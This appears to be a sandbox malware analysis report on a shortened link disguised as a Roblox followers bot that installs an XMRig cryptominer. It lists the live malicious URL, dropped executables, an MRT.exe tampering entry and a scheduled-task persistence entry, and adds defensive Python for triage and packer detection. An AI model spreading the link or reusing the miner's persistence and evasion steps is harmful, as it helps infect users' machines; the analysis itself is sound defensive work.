Malware Analysis Report

2025-08-05 11:14

Sample ID: 241027-ntmavayajp
Target: https://bit.ly/followersbot_rblx
Tags: xmrig discovery evasion execution miner persistence pyinstaller upx
Score: 10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 10/10

Threat Level: Known bad

The submitted target https://bit.ly/followersbot_rblx (a shortened URL, not a file) was classified as: Known bad.

Malicious Activity Summary

Suspicious use of NtCreateUserProcessOtherParentProcess

Xmrig family

xmrig

XMRig Miner payload

Creates new service(s)

Command and Scripting Interpreter: PowerShell

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

UPX packed file

Drops file in Program Files directory

Launches sc.exe

Browser Information Discovery

Detects Pyinstaller

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Modifies Internet Explorer settings

Delays execution with timeout.exe

Checks processor information in registry

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy service COM API

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious use of UnmapMainImage

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Opens file in notepad (likely ransom note)

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1

Detonation Overview

Reported: 2024-10-27 11:41

Signatures: N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-10-27 11:41
Reported: 2024-10-27 11:47
Platform: win10ltsc2021-20241023-en
Max time kernel: 335s
Max time network: 331s

Command Line: winlogon.exe

Signatures

Xmrig family (tags: xmrig)

xmrig (tags: miner xmrig)

XMRig Miner payload (tags: miner)

7 rows recorded, all four columns (Description, Indicator, Process, Target) N/A: the report identifies the XMRig payload by family signature only and does not attribute it to a process or file in this table.

Creates new service(s) (tags: persistence execution)

Stops running service(s) (tags: evasion execution)

No rows are recorded for either signature, so the service names are not in this report.

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\Downloads\followersbot\A9LDCODL.exe | N/A
(64 identical rows; the DLL paths were not captured in the Indicator column)

All 64 loads are attributed to A9LDCODL.exe in the download folder. That volume of DLL loads from a freshly dropped executable is consistent with a PyInstaller one-file bundle unpacking its Python runtime and extension DLLs before running (the report tags the sample pyinstaller but does not name the DLLs).

Drops file in System32 directory

Description | Indicator | Process | Target
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\System32\Tasks\dialersvc64 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe | N/A
File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\Downloads\followersbot\9SHCODL.exe | N/A
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A

What these rows show: powershell.exe writing under C:\Windows\system32\config\systemprofile\ means it ran as LocalSystem (that directory is the SYSTEM account's profile), which fits the service-creation signature. svchost.exe writing C:\Windows\System32\Tasks\dialersvc64 is the Task Scheduler service storing a newly registered task named dialersvc64, consistent with the "Uses Task Scheduler COM API" signature in the summary. C:\Windows\system32\MRT.exe (the Malicious Software Removal Tool) is opened for modification twice by the downloaded 9SHCODL.exe and twice by its ProgramData copy tonbcjgtfgwe.exe; the report does not record what was written. The CryptnetUrlCache rows are ordinary certificate-revocation cache activity by svchost.exe.

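The signature tables in this report flatten four columns into one line, and when both Indicator and Process are file paths the column boundary blurs. The following Python is an added example, not part of the sandbox report or its vendor's tooling: it parses such rows (pipe-delimited or space-flattened) and applies two triage rules that are this example's own assumptions, namely that a process is worth attention if it runs outside C:\Windows or the Program Files trees, and that an indicator is sensitive if it names MRT.exe or the System32\Tasks directory. The sample rows are copied from the tables in this report.

```python
"""Parse sandbox signature rows and flag the ones a responder should read first.

Added example, not part of the sandbox report or its vendor's tooling. The sample
rows are copied from the report; the trust roots, the sensitive-indicator list and
the reason strings are this example's own assumptions.
"""
import re
from dataclasses import dataclass

# Fixed vocabulary of the Description column, as it appears in the report.
DESCRIPTIONS = (
    "File opened for modification", "File created",
    "Key security queried", "Key value queried", "Key created",
    "Key opened", "Key queried", "Key deleted",
    "Set value (int)", "Set value (str)", "Set value (data)",
)

# Assumption: binaries under these roots are OS- or vendor-installed.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Assumption: indicator substrings that mark a high-value target, and the reason to report.
SENSITIVE_INDICATORS = {
    "\\mrt.exe": "tampers with the Malicious Software Removal Tool binary",
    "\\system32\\tasks\\": "registers a scheduled task (persistence)",
}

# A drive-letter path preceded by a space; the last one in a row is the Process column.
_PATH_START = re.compile(r" [A-Za-z]:\\")


@dataclass(frozen=True)
class Row:
    description: str
    indicator: str
    process: str
    target: str


def parse_row(line: str) -> Row:
    """Split one row into its four columns.

    Pipe-delimited rows are split directly. Space-flattened rows (as in raw
    exports) are split on the description vocabulary and on the last
    drive-letter path; the Target column is the final token (N/A throughout
    this report).
    """
    line = line.strip()
    if " | " in line:
        desc, ind, proc, target = (c.strip() for c in line.split(" | ", 3))
        return Row(desc, ind, proc, target)
    body, _, target = line.rpartition(" ")
    if body.startswith("N/A "):
        desc, body = "N/A", body[4:]
    else:
        desc = next((d for d in DESCRIPTIONS if body.startswith(d)), None)
        if desc is None:
            raise ValueError(f"unknown description in row: {line!r}")
        body = body[len(desc):].lstrip()
    starts = [m.start() for m in _PATH_START.finditer(body)]
    if starts:
        ind, proc = body[:starts[-1]], body[starts[-1] + 1:]
    else:                       # no path after the indicator: process is N/A
        ind, _, proc = body.rpartition(" ")
        ind = ind or "N/A"
    return Row(desc, ind, proc, target)


def triage(rows):
    """Return {process: set(reasons)} for the rows that match a rule."""
    findings = {}
    for row in rows:
        reasons = set()
        proc = row.process.lower()
        if proc != "n/a" and not proc.startswith(TRUSTED_ROOTS):
            reasons.add("runs from a user-writable location")
        ind = row.indicator.lower()
        reasons.update(why for needle, why in SENSITIVE_INDICATORS.items() if needle in ind)
        if reasons:
            findings.setdefault(row.process, set()).update(reasons)
    return findings


def summarize(lines):
    """Parse raw report lines (blank lines ignored) and triage them."""
    return triage(parse_row(l) for l in lines if l.strip())


# Constructed input: seven rows copied from the report's signature tables.
SAMPLE_ROWS = [
    r"File opened for modification C:\Windows\System32\Tasks\dialersvc64 C:\Windows\system32\svchost.exe N/A",
    r"File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\khcaldwkpicy\tonbcjgtfgwe.exe N/A",
    r"File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\Downloads\followersbot\9SHCODL.exe N/A",
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A",
    r"N/A N/A C:\Windows\system32\timeout.exe N/A",
    r"File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2b12a2bb-9197-427f-bdee-328153f6caeb.tmp C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe N/A",
    r'Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A',
]

if __name__ == "__main__":
    for process, reasons in sorted(summarize(SAMPLE_ROWS).items()):
        print(process)
        for reason in sorted(reasons):
            print("  -", reason)
```

On the sample rows this reports three processes: svchost.exe for the scheduled-task write, and both 9SHCODL.exe and tonbcjgtfgwe.exe for running from user-writable directories and touching MRT.exe. The WMI, timeout.exe, Edge installer and PowerShell rows pass the rules, which is the point: the rules isolate the rows that need a human, and the rest of the table can be read afterwards. Extend SENSITIVE_INDICATORS with whatever your environment treats as crown jewels; the parser does not need to change.
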
UPX packed file (tags: upx)

12 rows recorded, all four columns N/A; the report does not say which of the dropped files is UPX-packed.

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\2b12a2bb-9197-427f-bdee-328153f6caeb.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A
File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241027114144.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A

Both rows are Microsoft Edge's own installer writing its SetupMetrics files; the Process column shows no sample-controlled binary here.

Browser Information Discovery (tags: discovery)

No rows recorded.

Detects Pyinstaller (tags: pyinstaller)

1 row recorded, all four columns N/A; the report does not say which file carries the PyInstaller markers.

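The "UPX packed file" and "Detects Pyinstaller" signatures above report a match but no file. With the dropped binaries from this run in hand (A9LDCODL.exe, 9SHCODL.exe or tonbcjgtfgwe.exe), both markers are cheap to confirm statically: UPX leaves sections named UPX0/UPX1 in the section table, and a PyInstaller one-file executable carries the CArchive cookie, whose magic is the bytes MEI\x0c\x0b\x0a\x0b\x0e, in the overlay appended after the last section. The Python below is an added example, not the sandbox's own detection logic. Because no binary ships with this report, build_sample_pe() constructs a synthetic PE header skeleton (a constructed input, not a real sample) for the detectors to inspect; on a real file, pass open(path, "rb").read() to triage_pe().

```python
"""Static checks for the two packaging signatures in the report: UPX section names
and the PyInstaller archive cookie.

Added example, not from the report or the sandbox vendor. build_sample_pe()
fabricates a minimal PE64 header with a chosen section table so the checks can
run without a real sample; the detectors themselves do not depend on it.
"""
import struct

PYINSTALLER_COOKIE = b"MEI\x0c\x0b\x0a\x0b\x0e"  # magic that opens PyInstaller's CArchive cookie
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}   # section names written by the stock UPX stub


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> PE signature -> COFF header -> section table, return section names."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)          # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)   # COFF NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)    # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                               # section table follows the optional header
    names = []
    for i in range(n_sections):
        (raw,) = struct.unpack_from("<8s", data, table + 40 * i)   # IMAGE_SECTION_HEADER is 40 bytes
        names.append(raw.rstrip(b"\0"))
    return names


def triage_pe(data: bytes) -> dict:
    """Report section names plus the two packaging markers the sandbox flagged."""
    names = pe_section_names(data)
    return {
        "sections": [n.decode("ascii", "replace") for n in names],
        "upx": bool(UPX_SECTION_NAMES & set(names)),
        "pyinstaller": PYINSTALLER_COOKIE in data,  # cookie lives in the appended overlay
    }


def build_sample_pe(section_names, overlay: bytes = b"") -> bytes:
    """Constructed test input: a PE64 header skeleton with the given section names
    and an optional appended overlay. Section data pointers are not backed by data."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                      # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, 240, 0x22)
    optional = struct.pack("<H", 0x20B) + bytes(238)           # PE32+ magic, remaining fields zeroed
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", name.ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1),                  # VirtualSize, VirtualAddress
                    0x200, 0x400 + 0x200 * i,                  # SizeOfRawData, PointerToRawData
                    0, 0, 0, 0, 0x60000020)                    # relocs/linenumbers, Characteristics
        for i, name in enumerate(section_names))
    return bytes(dos) + b"PE\0\0" + coff + optional + sections + overlay


# Constructed samples: one that looks like a UPX-packed PyInstaller build, one that does not.
PACKED_SAMPLE = build_sample_pe([b"UPX0", b"UPX1", b".rsrc"],
                                overlay=bytes(64) + PYINSTALLER_COOKIE + bytes(24))
CLEAN_SAMPLE = build_sample_pe([b".text", b".rdata", b".data"])

if __name__ == "__main__":
    for label, blob in (("packed", PACKED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(label, triage_pe(blob))
```

Both checks are easy to defeat: a rebuilt UPX can rename its sections, and a packer that compresses the overlay hides the cookie until the file is unpacked. A negative result therefore rules nothing out, while a positive one is the cue to unpack (upx -d) and pull the PyInstaller archive apart before looking for the miner configuration.
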
Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A

The lookups are made by wmiprvse.exe (the WMI provider host, which answers WMI queries issued by other processes; the report does not say which process asked) and by WerFault.exe. CPU model and clock are what a miner needs to choose its hashing configuration, but this table on its own does not attribute the query to the sample.

Delays execution with timeout.exe (tags: evasion)

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\timeout.exe | N/A
N/A | N/A | C:\Windows\system32\timeout.exe | N/A

Two timeout.exe invocations; the delay arguments were not captured.

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A

The acting processes are msedge.exe and WerFault.exe, neither of them sample-dropped. WerFault.exe appearing at all means Windows Error Reporting was invoked for some process during the run; the report does not record which.

Modifies Internet Explorer settings (tags: adware spyware)

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\3 = 04000000000000000000803f000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\4 = 0420000000000000180000000000000000000000000000000000803f0000803f | C:\Windows\System32\svchost.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\88c34bd0_0\{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}\5 = 0b0000000000000000000000000000000000000000000000 | C:\Windows\System32\svchost.exe | N/A

Both acting processes (Explorer.EXE and svchost.exe) are OS components writing ordinary shell-sync and audio-policy values under the logged-on user's hive; nothing in these rows ties to the sample's own processes, so the adware/spyware tags are not supported by this table.

Modifies data under HKEY_USERS

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1730029393" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A
